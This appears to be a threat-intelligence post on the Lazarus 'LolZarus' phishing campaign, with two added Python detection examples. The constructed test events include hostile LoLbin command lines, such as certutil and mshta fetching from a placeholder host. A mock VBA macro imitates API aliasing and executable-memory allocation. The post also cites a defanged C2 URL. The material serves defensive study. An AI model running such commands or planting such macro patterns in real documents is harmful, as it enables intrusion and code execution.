Qualys Threat Research recently reported on a new Lazarus espionage campaign that uses employment-themed phishing emails to target the defense sector, primarily people applying for jobs at Lockheed Martin. The targeting resembles previous Lazarus campaigns aimed at Northrop Grumman and BAE Systems. Qualys calls the current campaign LolZarus because some of the samples use LoLbins, which Qualys notes is the first time it has observed Lazarus using them.
Who is Lazarus?
Lazarus, also known as Hidden Cobra, Dark Seoul, Labyrinth Chollima, and APT38, is a state-sponsored threat actor group likely affiliated with North Korea's Reconnaissance General Bureau. The group's members are reportedly trained in Shenyang, China, in malware development and espionage operations. Lazarus is known for espionage, disruptive attacks, and financially motivated operations. Known Lazarus tooling and techniques include DDoS attacks, wiper malware, botnets, keyloggers, and RATs.
The group's first known activity was Operation Troy, an espionage campaign targeting the South Korean government as early as 2009. The group's espionage activity aligns with the North Korean government's intelligence collection requirements, targeting South Korea, the US, and other nations. Lazarus is thought to be responsible for the 2014 Sony Pictures attack and the 2017 WannaCry ransomware campaign. Lazarus has also targeted banks in Ecuador, Vietnam, Bangladesh, Mexico, Poland, and Taiwan, and has been known to steal cryptocurrency. In 2020, Lazarus was allegedly responsible for attacks on multiple pharmaceutical companies, including AstraZeneca.
What Are LoLbins?
LoLbins, or Living off the Land Binaries, are the tools behind the living off the land technique. Living off the land refers to a threat actor's use of trusted, legitimate tools that are already present on a system to carry out malicious actions such as downloading, executing, or persisting malware, rather than dropping custom tooling that a scanner could flag. LoLbins abuse Windows binaries, including Microsoft-signed binaries, so that malicious activity blends in with normal system and network activity and passes controls that trust signed vendor code, such as application allowlisting. Threat actors often leverage LoLbins in fileless malware attacks.
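As an added example (not code from Qualys or from this page's author; the page does not name which LoLbins the LolZarus samples used, so the binaries and rules below are a generic illustrative set drawn from commonly abused signed Windows binaries), here is the kind of process-creation triage a detection engineer would run to separate LoLbin abuse from ordinary administrative use. The events are constructed, and the image, parent and command-line fields are assumptions about what a Sysmon or EDR process-creation record carries.

```python
import re
from dataclasses import dataclass

# Signed Windows binaries commonly abused for living off the land. This is an
# illustrative subset chosen for the example; the LOLBAS project catalogues
# many more. Which LoLbins LolZarus used is not stated on this page.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe",
           "msiexec.exe", "wmic.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Public|Downloads|ProgramData)\\", re.I)
URL = re.compile(r"https?://", re.I)


@dataclass
class ProcEvent:
    image: str         # full path of the created process (assumed field)
    cmdline: str       # full command line (assumed field)
    parent_image: str  # full path of the parent process (assumed field)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons an event looks like LoLbin abuse.

    A LoLbin running on its own is normal. It is the combination with an
    Office parent, a URL, a payload in a user-writable path, or a known
    abuse switch that separates phishing-document style use from admin use.
    """
    reasons = []
    name = basename(ev.image)
    if name not in LOLBINS:
        return reasons
    reasons.append(f"lolbin:{name}")
    if basename(ev.parent_image) in OFFICE_APPS:
        reasons.append("parent:office")
    if URL.search(ev.cmdline):
        reasons.append("cmdline:url")
    if USER_WRITABLE.search(ev.cmdline):
        reasons.append("cmdline:user-writable-path")
    if name == "certutil.exe" and re.search(r"-(urlcache|decode)\b", ev.cmdline, re.I):
        reasons.append("certutil:download-or-decode")
    if name == "regsvr32.exe" and re.search(r"/i:", ev.cmdline, re.I):
        reasons.append("regsvr32:scriptlet-switch")
    return reasons


def is_suspicious(reasons):
    # Two independent indicators; the bare "lolbin:" tag never alerts alone.
    return len(reasons) >= 2


def detect(events):
    """Indices of events that should be alerted on, paired with their reasons."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if is_suspicious(reasons):
            hits.append((i, reasons))
    return hits


# Constructed process-creation events for this example; not real telemetry.
EVENTS = [
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,Start",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://example.invalid/page.hta",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f http://example.invalid/a.txt C:\Users\Public\a.txt",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, reasons in detect(EVENTS):
        print(idx, basename(EVENTS[idx].image), reasons)
```

The third event, rundll32 launched by svchost to load a System32 DLL, collects only the bare "lolbin:" tag and is not alerted on; that is the point of scoring combinations rather than binary names, because a rule on rundll32 alone would page on every Control Panel applet.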
Qualys identified two malicious phishing documents used in the LolZarus campaign: Lockheed_Martin_JobOpportunities.docx and Salary_Lockheed_Martin_job_opportunities_confidential.doc. The VBA macros in the documents use the Alias keyword to declare the Windows APIs they call under different names, so the calling code never refers to the real API names. Instead of a conventional AutoOpen handler, the macro uses the Layout event of an embedded ActiveX Frame control (Frame1_Layout) to execute automatically. The macro loads the Windows Media DLL WMVCORE.DLL, then checks for a document variable before entering its main functionality block.
The second-stage payload is shellcode embedded in the macro as an array of base64-encoded strings. The shellcode uses advanced control-flow hijacking techniques, then sets up a connection to the C2 at https://markettrendingcenter[.]com/member[.]htm.
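The macro traits described above (API aliasing, the Frame1_Layout trigger, the WMVCORE.DLL load, the document-variable check and the base64 string array carrying the second stage) can all be checked for in one static triage pass over extracted VBA source. The following is an added example written for this page, not code from Qualys or from the LolZarus samples. It runs over a constructed VBA snippet that imitates those traits rather than the real macro; the decoded "payload" is a placeholder string, and the event and API names in the regexes are the author's choices, not a complete list.

```python
import base64
import binascii
import re
from collections import defaultdict

# Constructed VBA source for this example. It imitates the traits the report
# describes (aliased API declarations, a Frame1_Layout auto-execute handler, a
# WMVCORE.DLL load, a document-variable check, a base64 string array). It is
# not the LolZarus macro, and the "payload" is a placeholder string.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function xLoad Lib "kernel32" Alias "LoadLibraryA" (ByVal n As String) As LongPtr
Private Declare PtrSafe Function xAlloc Lib "kernel32" Alias "VirtualAlloc" (ByVal a As LongPtr, ByVal s As LongPtr, ByVal t As Long, ByVal p As Long) As LongPtr

Private Sub Frame1_Layout()
    Dim h As LongPtr
    h = xLoad("WMVCORE.DLL")
    If ActiveDocument.Variables("cfg").Value <> "" Then
        RunStage
    End If
End Sub

Sub RunStage()
    Dim blob(1) As String
    blob(0) = "SGVsbG8sIH"
    blob(1) = "NoZWxsY29kZSE="
    Dim p As LongPtr
    p = xAlloc(0, 4096, &H3000, &H40)
End Sub
'''

# Declare ... Alias "RealApi": the rest of the code calls the local name only,
# so a keyword scan for "VirtualAlloc(" at call sites would miss it.
ALIAS_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"\s+Alias\s+"([^"]+)"', re.I)
# Handlers Word runs without a click, including control events such as
# <control>_Layout that can substitute for AutoOpen. Illustrative list.
AUTOEXEC_RE = re.compile(
    r'\bSub\s+(AutoOpen|AutoExec|Document_Open|\w+_Layout|\w+_Initialize)\b', re.I)
DLL_RE = re.compile(r'"([\w.-]+\.dll)"', re.I)
DOCVAR_RE = re.compile(r'ActiveDocument\.Variables\("([^"]+)"\)', re.I)
# name(index) = "base64chunk"
ARRAY_ELEM_RE = re.compile(r'\b(\w+)\((\d+)\)\s*=\s*"([A-Za-z0-9+/=]+)"')


def find_aliased_apis(src):
    """Return (local_name, library, real_api) for every aliased Declare."""
    return ALIAS_RE.findall(src)


def find_autoexec_triggers(src):
    return AUTOEXEC_RE.findall(src)


def find_dll_loads(src):
    return DLL_RE.findall(src)


def find_document_variables(src):
    return DOCVAR_RE.findall(src)


def extract_b64_arrays(src):
    """Reassemble string arrays in index order and base64-decode them.

    Chunks are concatenated before decoding because individual elements need
    not fall on 4-character base64 boundaries. Arrays that are not valid
    base64 are skipped rather than reported as payloads.
    """
    chunks = defaultdict(list)
    for name, idx, chunk in ARRAY_ELEM_RE.findall(src):
        chunks[name].append((int(idx), chunk))
    decoded = {}
    for name, parts in chunks.items():
        joined = "".join(c for _, c in sorted(parts))
        try:
            decoded[name] = base64.b64decode(joined, validate=True)
        except binascii.Error:
            continue
    return decoded


def triage(src):
    """Summarise the indicators; score counts how many trait classes are present."""
    report = {
        "aliased_apis": find_aliased_apis(src),
        "autoexec": find_autoexec_triggers(src),
        "dlls": find_dll_loads(src),
        "doc_variables": find_document_variables(src),
        "b64_arrays": {k: len(v) for k, v in extract_b64_arrays(src).items()},
    }
    report["score"] = sum(1 for v in report.values() if v)
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

In practice the source string would come from a macro extractor such as oletools' olevba run against the .doc or .docx; the decoded bytes from extract_b64_arrays are what you would hand to a shellcode emulator or disassembler rather than execute.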
PolySwarm has multiple samples associated with Lazarus APT’s LolZarus activity.